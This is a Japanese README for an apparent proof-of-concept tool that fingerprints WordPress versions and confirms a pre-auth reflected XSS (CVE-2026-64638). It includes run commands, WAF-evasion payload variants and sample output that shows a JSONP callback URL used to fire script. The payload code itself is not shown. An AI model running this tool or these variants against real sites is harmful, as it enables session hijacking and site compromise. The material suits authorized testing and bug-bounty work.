
WordPressにおける認証前の反射型XSSを検証し、脆弱なバージョンのフィンガープリントを特定し、ペイロードの反射とJSONPをチェックし、HTML/curlのPoC成果物を生成します。
CVE-2026-64638 を検証するための概念実証(PoC)ツールです。これは、WordPress インストール(バージョン 6.4 ~ 7.0.2)に影響を与える事前認証型の反射型クロスサイトスクリプティング(XSS)脆弱性です。
このツールは、CVE-2026-64638 に関するフィンガープリンティング、検証、PoC 生成のプロセスを自動化します。悪意のあるペイロードを展開することなく、対象の WordPress インストールが事前認証型の反射型 XSS に対して脆弱かどうかを安全に確認します。対象が脆弱であると確認された場合、許可されたセキュリティテストやバグバウンティレポートへの記載に使用できる HTML PoC を生成します。
standard、envelope、waf)をサポートします。readme.html、またはエンキューされたスクリプトパラメータを介して WordPress バージョンを識別します。wp-login.php が到達可能で機能することを確認します。wp-login.php に送信し、応答内で必要な DOM 要素(例:ajaxurl、color-picker)がサニタイズ後も残っているかどうかを確認します。requests>=2.31.0、urllib3リポジトリをクローンし、必要な依存関係をインストールします:
git clone https://github.com/your-username/xss2shell-poc.git
cd xss2shell-poc
pip install -r requirements.txt
このツールは、環境変数や複雑な設定ファイルを必要としません。すべてのパラメータはコマンドライン引数で直接渡されます。
許可された対象に対して、Python 3 でツールを実行します。
python3 xss2shell_poc.py -t https://target.com --check-only
python3 xss2shell_poc.py -t https://target.com
標準ペイロードが WAF によってブロックされた場合、または REST エンドポイントが HTTP 401 を返す場合は、代替バリアントを試してください:
python3 xss2shell_poc.py -t https://target.com --variant waf
python3 xss2shell_poc.py -t https://target.com --variant envelope
python3 xss2shell_poc.py -t https://target.com -o custom_poc.html
.
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── SECURITY.md
├── requirements.txt
└── xss2shell_poc.py
Target : https://target.com
Variant : standard
Mode : Full PoC
[>] Phase 1 — WordPress Version Fingerprint
[+] WordPress 7.0.2 — VULNERABLE (6.4 – 7.0.2)
[>] Phase 2 — Confirm Login Page
[+] wp-login.php reachable (HTTP 200)
[>] Phase 3 — Testing XSS Payload (variant: standard)
[+] XSS PAYLOAD SURVIVED SANITIZATION!
[+] Injected DOM elements found in response: ['id="ajaxurl"', 'id="color-picker"']
[>] Phase 4 — REST API JSONP Callback Check
[+] REST JSONP callback works: https://target.com/?rest_route=/&_method=GET&_jsonp=testcb
[+] jQuery will evaluate response as script → XSS fires automatically
このリポジトリには、セキュリティ関連のテストツールが含まれています。 責任ある開示ポリシーと許可された使用要件については、SECURITY.md を参照してください。
プロフェッショナルなコントリビューションを歓迎します! ワークフロー、コード品質基準、提出ガイドラインの詳細については、CONTRIBUTING.md を参照してください。
このプロジェクトは MIT ライセンス の下でライセンスされています。
許可された用途のみを対象としています。 このプロジェクトは、システム所有者から明示的な書面による許可が付与された、許可されたペネトレーションテスト、セキュリティ調査、およびバグバウンティプログラム専用に提供されています。所有していない、またはテストする許可がないシステムに対してこのツールを使用しないでください。著者およびコントリビューターは、このソフトウェアの使用に起因する誤用、損害、または法的結果について一切の責任を負いません。